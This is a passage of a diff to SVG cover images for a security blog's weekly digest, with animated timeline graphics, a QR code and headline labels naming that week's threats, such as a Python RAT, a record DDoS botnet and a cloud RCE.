+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#22C55E">THREAT</text>
+    <text x="10" y="16" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="30" font-weight="900" fill="#F5F7FA">APT</text>
+    <text x="10" y="40" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="700" fill="#86EFAC">Go toolchain</text>
+    <text x="10" y="56" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#86EFAC">espionage</text>
+  </g>
+
+  <!-- band C accent: static dots -->
+  <g fill="#22C55E" opacity="0.5">
+    <circle cx="300" cy="450" r="1.5"/>
+    <circle cx="370" cy="450" r="1.5"/>
+    <circle cx="440" cy="450" r="1.5"/>
+    <circle cx="510" cy="450" r="1.5"/>
+  </g>
+</g>
+
+<!-- QR placeholder — replaced by add_cover_qr.py -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <rect x="2" y="2" width="82" height="82" rx="4" fill="#F5F5F5"/>
+  <text x="43" y="48" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#999">QR</text>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/05/Tech_Security_Weekly_Digest_CVE_AI_Malware_Go/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM9 0h1v1h-1zM11 0h8v1h-8zM20 0h3v1h-3zM25 0h1v1h-1zM28 0h1v1h-1zM30 0h3v1h-3zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM10 1h3v1h-3zM14 1h1v1h-1zM16 1h2v1h-2zM20 1h2v1h-2zM24 1h4v1h-4zM29 1h1v1h-1zM32 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM8 2h2v1h-2zM11 2h12v1h-12zM25 2h1v1h-1zM27 2h2v1h-2zM32 2h1v1h-1zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h1v1h-1zM12 3h1v1h-1zM14 3h1v1h-1zM16 3h1v1h-1zM19 3h3v1h-3zM26 3h4v1h-4zM32 3h1v1h-1zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h1v1h-1zM10 4h1v1h-1zM12 4h1v1h-1zM15 4h1v1h-1zM17 4h2v1h-2zM20 4h3v1h-3zM30 4h2v1h-2zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h3v1h-3zM14 5h2v1h-2zM17 5h1v1h-1zM20 5h1v1h-1zM25 5h1v1h-1zM27 5h1v1h-1zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM8 7h2v1h-2zM11 7h2v1h-2zM14 7h1v1h-1zM18 7h4v1h-4zM23 7h1v1h-1zM27 7h1v1h-1zM30 7h2v1h-2zM0 8h1v1h-1zM2 8h5v1h-5zM9 8h1v1h-1zM12 8h1v1h-1zM14 8h1v1h-1zM16 8h2v1h-2zM19 8h1v1h-1zM22 8h2v1h-2zM25 8h5v1h-5zM32 8h1v1h-1zM34 8h5v1h-5zM0 9h1v1h-1zM3 9h3v1h-3zM7 9h1v1h-1zM9 9h1v1h-1zM14 9h1v1h-1zM16 9h1v1h-1zM18 9h2v1h-2zM21 9h1v1h-1zM23 9h1v1h-1zM26 9h1v1h-1zM30 9h3v1h-3zM35 9h2v1h-2zM38 9h3v1h-3zM0 10h1v1h-1zM2 10h2v1h-2zM5 10h2v1h-2zM10 10h1v1h-1zM12 10h1v1h-1zM17 10h2v1h-2zM21 10h2v1h-2zM24 10h2v1h-2zM27 10h1v1h-1zM30 10h1v1h-1zM32 10h2v1h-2zM35 10h2v1h-2zM2 11h2v1h-2zM7 11h1v1h-1zM10 11h1v1h-1zM12 11h1v1h-1zM14 11h1v1h-1zM19 11h3v1h-3zM28 11h1v1h-1zM30 11h3v1h-3zM37 11h1v1h-1zM0 12h1v1h-1zM3 12h1v1h-1zM6 12h4v1h-4zM11 12h2v1h-2zM16 12h2v1h-2zM19 12h2v1h-2zM22 12h1v1h-1zM24 12h2v1h-2zM28 12h4v1h-4zM35 12h1v1h-1zM37 12h2v1h-2zM40 12h1v1h-1zM0 13h6v1h-6zM7 13h1v1h-1zM9 13h2v1h-2zM13 13h2v1h-2zM16 13h1v1h-1zM18 13h1v1h-1zM25 13h1v1h-1zM27 13h1v1h-1zM29 13h1v1h-1zM32 13h1v1h-1zM34 13h5v1h-5zM40 13h1v1h-1zM0 14h1v1h-1zM3 14h2v1h-2zM6 14h2v1h-2zM10 14h6v1h-6zM18 14h1v1h-1zM20 14h1v1h-1zM22 14h3v1h-3zM27 14h4v1h-4zM32 14h2v1h-2zM35 14h1v1h-1zM37 14h2v1h-2zM0 15h5v1h-5zM7 15h3v1h-3zM11 15h1v1h-1zM13 15h3v1h-3zM21 15h3v1h-3zM26 15h2v1h-2zM31 15h2v1h-2zM34 15h1v1h-1zM36 15h2v1h-2zM1 16h1v1h-1zM4 16h4v1h-4zM9 16h1v1h-1zM13 16h1v1h-1zM15 16h2v1h-2zM20 16h4v1h-4zM25 16h3v1h-3zM29 16h1v1h-1zM31 16h1v1h-1zM33 16h1v1h-1zM35 16h1v1h-1zM37 16h2v1h-2zM0 17h1v1h-1zM2 17h1v1h-1zM5 17h1v1h-1zM8 17h5v1h-5zM15 17h2v1h-2zM18 17h1v1h-1zM20 17h1v1h-1zM23 17h1v1h-1zM27 17h6v1h-6zM34 17h3v1h-3zM39 17h2v1h-2zM2 18h1v1h-1zM5 18h3v1h-3zM9 18h1v1h-1zM11 18h3v1h-3zM15 18h1v1h-1zM18 18h1v1h-1zM20 18h1v1h-1zM22 18h1v1h-1zM27 18h3v1h-3zM32 18h1v1h-1zM36 18h1v1h-1zM38 18h2v1h-2zM0 19h3v1h-3zM9 19h5v1h-5zM16 19h1v1h-1zM20 19h1v1h-1zM23 19h2v1h-2zM26 19h1v1h-1zM28 19h1v1h-1zM32 19h2v1h-2zM36 19h2v1h-2zM0 20h1v1h-1zM3 20h2v1h-2zM6 20h1v1h-1zM9 20h1v1h-1zM12 20h2v1h-2zM18 20h1v1h-1zM20 20h3v1h-3zM24 20h1v1h-1zM28 20h3v1h-3zM32 20h1v1h-1zM38 20h1v1h-1zM40 20h1v1h-1zM0 21h2v1h-2zM3 21h1v1h-1zM5 21h1v1h-1zM7 21h1v1h-1zM10 21h1v1h-1zM13 21h1v1h-1zM16 21h1v1h-1zM20 21h2v1h-2zM23 21h2v1h-2zM26 21h1v1h-1zM30 21h2v1h-2zM34 21h3v1h-3zM39 21h2v1h-2zM0 22h1v1h-1zM4 22h3v1h-3zM8 22h1v1h-1zM10 22h1v1h-1zM12 22h7v1h-7zM21 22h1v1h-1zM26 22h3v1h-3zM32 22h1v1h-1zM34 22h2v1h-2zM37 22h1v1h-1zM4 23h2v1h-2zM7 23h3v1h-3zM12 23h1v1h-1zM21 23h2v1h-2zM28 23h1v1h-1zM31 23h2v1h-2zM34 23h4v1h-4zM40 23h1v1h-1zM1 24h1v1h-1zM4 24h1v1h-1zM6 24h4v1h-4zM11 24h2v1h-2zM15 24h1v1h-1zM17 24h1v1h-1zM19 24h1v1h-1zM22 24h1v1h-1zM24 24h3v1h-3zM29 24h1v1h-1zM31 24h1v1h-1zM35 24h1v1h-1zM38 24h3v1h-3zM0 25h1v1h-1zM4 25h1v1h-1zM7 25h2v1h-2zM15 25h2v1h-2zM18 25h4v1h-4zM23 25h1v1h-1zM25 25h2v1h-2zM30 25h2v1h-2zM35 25h3v1h-3zM39 25h1v1h-1zM0 26h1v1h-1zM3 26h1v1h-1zM6 26h1v1h-1zM11 26h1v1h-1zM13 26h2v1h-2zM20 26h3v1h-3zM25 26h3v1h-3zM29 26h2v1h-2zM32 26h2v1h-2zM36 26h1v1h-1zM0 27h3v1h-3zM5 27h1v1h-1zM9 27h1v1h-1zM15 27h2v1h-2zM19 27h5v1h-5zM26 27h2v1h-2zM30 27h8v1h-8zM40 27h1v1h-1zM1 28h1v1h-1zM3 28h1v1h-1zM5 28h2v1h-2zM8 28h1v1h-1zM10 28h3v1h-3zM15 28h1v1h-1zM17 28h1v1h-1zM19 28h1v1h-1zM22 28h2v1h-2zM25 28h1v1h-1zM29 28h4v1h-4zM35 28h1v1h-1zM37 28h2v1h-2zM40 28h1v1h-1zM0 29h2v1h-2zM3 29h3v1h-3zM7 29h1v1h-1zM9 29h3v1h-3zM16 29h3v1h-3zM20 29h2v1h-2zM24 29h1v1h-1zM26 29h4v1h-4zM32 29h5v1h-5zM40 29h1v1h-1zM0 30h1v1h-1zM6 30h1v1h-1zM9 30h1v1h-1zM12 30h1v1h-1zM14 30h1v1h-1zM18 30h2v1h-2zM25 30h2v1h-2zM32 30h4v1h-4zM0 31h1v1h-1zM3 31h2v1h-2zM7 31h5v1h-5zM13 31h1v1h-1zM15 31h2v1h-2zM19 31h4v1h-4zM24 31h1v1h-1zM26 31h1v1h-1zM28 31h1v1h-1zM30 31h1v1h-1zM32 31h4v1h-4zM37 31h1v1h-1zM40 31h1v1h-1zM0 32h1v1h-1zM4 32h3v1h-3zM9 32h1v1h-1zM11 32h1v1h-1zM14 32h1v1h-1zM16 32h1v1h-1zM19 32h1v1h-1zM21 32h2v1h-2zM25 32h2v1h-2zM28 32h2v1h-2zM32 32h5v1h-5zM38 32h2v1h-2zM8 33h1v1h-1zM10 33h1v1h-1zM13 33h1v1h-1zM15 33h1v1h-1zM17 33h1v1h-1zM20 33h4v1h-4zM25 33h1v1h-1zM27 33h3v1h-3zM32 33h1v1h-1zM36 33h1v1h-1zM38 33h3v1h-3zM0 34h7v1h-7zM9 34h3v1h-3zM17 34h1v1h-1zM21 34h1v1h-1zM25 34h5v1h-5zM31 34h2v1h-2zM34 34h1v1h-1zM36 34h2v1h-2zM0 35h1v1h-1zM6 35h1v1h-1zM8 35h1v1h-1zM10 35h1v1h-1zM17 35h6v1h-6zM25 35h1v1h-1zM27 35h1v1h-1zM31 35h2v1h-2zM36 35h2v1h-2zM40 35h1v1h-1zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM8 36h2v1h-2zM13 36h2v1h-2zM21 36h1v1h-1zM26 36h1v1h-1zM30 36h1v1h-1zM32 36h7v1h-7zM40 36h1v1h-1zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM8 37h2v1h-2zM11 37h2v1h-2zM14 37h1v1h-1zM16 37h9v1h-9zM30 37h4v1h-4zM35 37h1v1h-1zM37 37h2v1h-2zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM8 38h1v1h-1zM12 38h4v1h-4zM17 38h2v1h-2zM20 38h1v1h-1zM22 38h1v1h-1zM24 38h4v1h-4zM29 38h3v1h-3zM33 38h4v1h-4zM0 39h1v1h-1zM6 39h1v1h-1zM10 39h3v1h-3zM19 39h1v1h-1zM21 39h2v1h-2zM24 39h1v1h-1zM26 39h1v1h-1zM28 39h1v1h-1zM32 39h2v1h-2zM36 39h2v1h-2zM39 39h1v1h-1zM0 40h7v1h-7zM8 40h1v1h-1zM10 40h1v1h-1zM14 40h3v1h-3zM22 40h1v1h-1zM24 40h4v1h-4zM29 40h1v1h-1zM34 40h5v1h-5z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-06-Tech_Security_Weekly_Digest_AI_Botnet_Cloud_Threat.svg
+++ b/assets/images/2026-02-06-Tech_Security_Weekly_Digest_AI_Botnet_Cloud_Threat.svg
@@ -1,134 +1,387 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 06, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: CrashFix ClickFix Python RAT targets enterprise systems, AISURU botnet sets 31.4 Tbps DDoS world record, Codespaces RCE plus AsyncRAT C2 plus BYOVD complex cloud threat">
+<!-- profile: high-quality-cover (L14 Timeline, research-based, batch1-locked) -->
+<title>Weekly digest 2026-02-06 timeline: CrashFix Python RAT (Feb 03), AISURU 31.4 Tbps DDoS (Feb 05), Codespaces RCE BYOVD (Feb 06)</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="55%" stop-color="#0D1530"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="colA" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#122542"/>
+    <stop offset="100%" stop-color="#0A1830"/>
+  </linearGradient>
+  <linearGradient id="colB" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#1A2E0A"/>
+    <stop offset="100%" stop-color="#101E06"/>
+  </linearGradient>
+  <linearGradient id="colC" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2E1016"/>
+    <stop offset="100%" stop-color="#1E0A12"/>
+  </linearGradient>
+  <linearGradient id="timelineGrad" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#4ADE80" stop-opacity="0.2"/>
+    <stop offset="35%" stop-color="#3A86FF" stop-opacity="0.9"/>
+    <stop offset="65%" stop-color="#22C55E" stop-opacity="0.9"/>
+    <stop offset="100%" stop-color="#E63946"/>
+  </linearGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3A86FF" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#3A86FF" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowGreen" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#22C55E" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#22C55E" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.65"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="40" height="40" patternUnits="userSpaceOnUse">
+    <circle cx="20" cy="20" r="0.8" fill="#2A3256" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.6"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.8"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Ambient glow behind columns -->
+<circle cx="240" cy="390" r="140" fill="url(#glowBlue)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="6.4s" repeatCount="indefinite"/>
+</circle>
+<circle cx="620" cy="390" r="140" fill="url(#glowGreen)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="5.6s" repeatCount="indefinite"/>
+</circle>
+<circle cx="1000" cy="390" r="140" fill="url(#glowRed)">
+  <animate attributeName="opacity" values="0.5;0.85;0.5" dur="7.0s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Header bar -->
+<rect x="0" y="0" width="1200" height="56" fill="#050813" opacity="0.92"/>
+<text x="36" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#8FB8FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.02.06</text>
+<rect x="0" y="54" width="1200" height="2" fill="#8FB8FF" opacity="0.85">
+  <animate attributeName="opacity" values="0.4;1;0.4" dur="4.8s" repeatCount="indefinite"/>
+</rect>
+
+<!-- Starfield ambient dots (static) -->
+<g fill="#8FB8FF" opacity="0.5">
+  <circle cx="160" cy="78" r="1.2"/>
+  <circle cx="420" cy="86" r="1.0"/>
+  <circle cx="720" cy="80" r="1.3"/>
+  <circle cx="1040" cy="88" r="0.9"/>
+</g>
+
+<!-- Subtitle row -->
+<text x="60" y="96" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#9FD3B0" letter-spacing="3">THIS WEEK  /  JAN 31 - FEB 06</text>
+<text x="60" y="130" font-family="Inter, Helvetica, Arial, sans-serif" font-size="28" font-weight="800" fill="#F5F7FA" filter="url(#textShadow)">CrashFix RAT, Record DDoS, Cloud RCE</text>
+
+<!-- Timeline axis at y=170 -->
+<line x1="60" y1="170" x2="1140" y2="170" stroke="url(#timelineGrad)" stroke-width="3.4" stroke-linecap="round"/>
+<!-- Moving traveler along axis -->
+<circle r="5" fill="#F5F7FA" stroke="#8FB8FF" stroke-width="1.4">
+  <animate attributeName="cx" values="60;1140;60" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0;1;1;1;0" dur="11s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Date ticks: JAN 31 to FEB 06 (7 ticks) -->
+<g font-family="Inter, monospace" font-size="10" font-weight="700" fill="#7DA3D9">
+  <line x1="80" y1="163" x2="80" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="80" y="194" text-anchor="middle">JAN 31</text>
+  <line x1="240" y1="163" x2="240" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="240" y="194" text-anchor="middle">FEB 01</text>
+  <line x1="400" y1="163" x2="400" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="400" y="194" text-anchor="middle">FEB 02</text>
+  <line x1="560" y1="163" x2="560" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="560" y="194" text-anchor="middle" fill="#3A86FF">FEB 03</text>
+  <line x1="720" y1="163" x2="720" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="720" y="194" text-anchor="middle">FEB 04</text>
+  <line x1="900" y1="163" x2="900" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="900" y="194" text-anchor="middle" fill="#22C55E">FEB 05</text>
+  <line x1="1100" y1="163" x2="1100" y2="177" stroke="#4A6AA0" stroke-width="1.2"/>
+  <text x="1100" y="194" text-anchor="middle" fill="#F87171">FEB 06</text>
+</g>
+
+<!-- Event anchor dots: Col A at FEB 03 (x=560), Col B at FEB 05 (x=900), Col C at FEB 06 (x=1100) -->
+<g>
+  <g transform="translate(560,170)">
+    <circle r="22" fill="url(#glowBlue)">
+      <animate attributeName="r" values="20;32;20" dur="2.8s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="10" fill="#0A1B2E" stroke="#3A86FF" stroke-width="3" filter="url(#softShadow)"/>
+    <circle r="3.5" fill="#8FB8FF">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.6s" repeatCount="indefinite"/>
+    </circle>
   </g>
-
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+  <g transform="translate(900,170)">
+    <circle r="22" fill="url(#glowGreen)">
+      <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.4s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="10" fill="#0E2A14" stroke="#22C55E" stroke-width="3" filter="url(#softShadow)"/>
+    <circle r="3.5" fill="#86EFAC">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.8s" repeatCount="indefinite"/>
+    </circle>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 06, 2026</text>
-
-  <!-- Card 1: SEC OPS -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#ef4444" stroke-width="1.8"/>
+  <g transform="translate(1100,170)">
+    <circle r="22" fill="url(#glowRed)">
+      <animate attributeName="r" values="20;32;20" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.6;1;0.6" dur="2.8s" begin="0.8s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="10" fill="#1E0A14" stroke="#E63946" stroke-width="3" filter="url(#softShadow)"/>
+    <circle r="3.5" fill="#FCA5A5">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.7s" repeatCount="indefinite"/>
+    </circle>
   </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">SEC OPS</text>
-  <!-- Card 2: CLOUD SEC -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8" transform="scale(0.65)"/>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 3: THREAT INT -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">THREAT INT</text>
-  <!-- Card 4: AI AGENT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#22c55e" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#22c55e" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">AI AGENT</text>
-  <!-- Card 5: PATCH MGT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">CVE</text>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
+</g>
 
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
+<!-- Dashed drop lines from anchors to column tops -->
+<line x1="560" y1="180" x2="240" y2="216" stroke="#3A86FF" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="900" y1="180" x2="620" y2="216" stroke="#22C55E" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
+<line x1="1100" y1="180" x2="1000" y2="216" stroke="#E63946" stroke-width="1.4" stroke-dasharray="3 3" opacity="0.7"/>
 
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+<!-- COL A: CrashFix Python RAT (Feb 03) -->
+<g transform="translate(72,216)">
+  <rect x="0" y="0" width="336" height="390" rx="14" fill="url(#colA)" stroke="#3A86FF" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="336" height="4" fill="#3A86FF" opacity="0.7"/>
+  <g filter="url(#textShadow)">
+    <text x="20" y="28" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="700" fill="#8FB8FF" letter-spacing="2.4">HIGH  /  AI MALWARE</text>
+    <text x="20" y="56" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="800" fill="#F5F7FA">CrashFix Python RAT</text>
